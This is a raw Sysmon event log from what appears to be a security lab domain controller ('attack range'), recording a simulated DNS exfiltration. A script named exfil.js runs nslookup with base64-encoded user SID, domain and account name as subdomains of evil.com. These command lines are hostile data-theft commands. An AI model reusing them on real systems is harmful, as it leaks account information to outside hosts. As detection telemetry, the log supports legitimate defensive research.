154100x8000000000000000206807Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.976{2E1864BB-18E5-629A-CA42-000000005F02}8136C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrirvl.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206806Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.972{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnvo.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206805Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.951{2E1864BB-18E5-629A-C842-000000005F02}58281648C:\Windows\system32\conhost.exe{2E1864BB-18E5-629A-C942-000000005F02}7388C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206804Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.935{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206803Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.935{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206802Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.935{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206801Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.935{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206800Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.935{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-C942-000000005F02}7388C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206799Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.935{2E1864BB-18E5-629A-C742-000000005F02}58843396C:\Windows\system32\cmd.exe{2E1864BB-18E5-629A-C942-000000005F02}7388C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206798Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.948{2E1864BB-18E5-629A-C942-000000005F02}7388C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E5-629A-C742-000000005F02}5884C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnvo.tmp 2>&1 10341000x8000000000000000206797Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.919{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E5-629A-C842-000000005F02}5828C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206796Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.919{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E5-629A-C842-000000005F02}5828C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206795Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.919{2E1864BB-18E5-629A-C842-000000005F02}58281648C:\Windows\system32\conhost.exe{2E1864BB-18E5-629A-C742-000000005F02}5884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206794Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.919{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-C842-000000005F02}5828C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206793Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.904{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206792Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.904{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206791Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.904{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206790Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.904{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206789Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.904{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-C742-000000005F02}5884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206788Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.904{2E1864BB-18E0-629A-6742-000000005F02}39766052C:\Windows\System32\WScript.exe{2E1864BB-18E5-629A-C742-000000005F02}5884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206787Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.915{2E1864BB-18E5-629A-C742-000000005F02}5884C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnvo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206786Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.904{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nllenv.tmpMD5=9C101754059B3D04F26CF3E2F51B88AA,SHA256=CC24D14F511AA03DA88D98786AE6BD9247656E6D05B1882F17E6E6D57E27DA80,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206785Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.888{2E1864BB-18E5-629A-C542-000000005F02}73206208C:\Windows\system32\conhost.exe{2E1864BB-18E5-629A-C642-000000005F02}488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206784Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.888{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206783Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.888{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206782Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.888{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206781Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.888{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206780Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.888{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-C642-000000005F02}488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206779Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.888{2E1864BB-18E5-629A-C442-000000005F02}74606192C:\Windows\system32\cmd.exe{2E1864BB-18E5-629A-C642-000000005F02}488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206778Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.892{2E1864BB-18E5-629A-C642-000000005F02}488C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E5-629A-C442-000000005F02}7460C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllenv.tmp 2>&1 23542300x8000000000000000206777Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.888{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=223BA418B156519A8A255EA7261FDB6C,SHA256=C3E1DBEE2CF40E3410A7CA5158792FB9ED81783293D6F14D394F46908BABCFEB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206776Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.872{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E5-629A-C542-000000005F02}7320C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 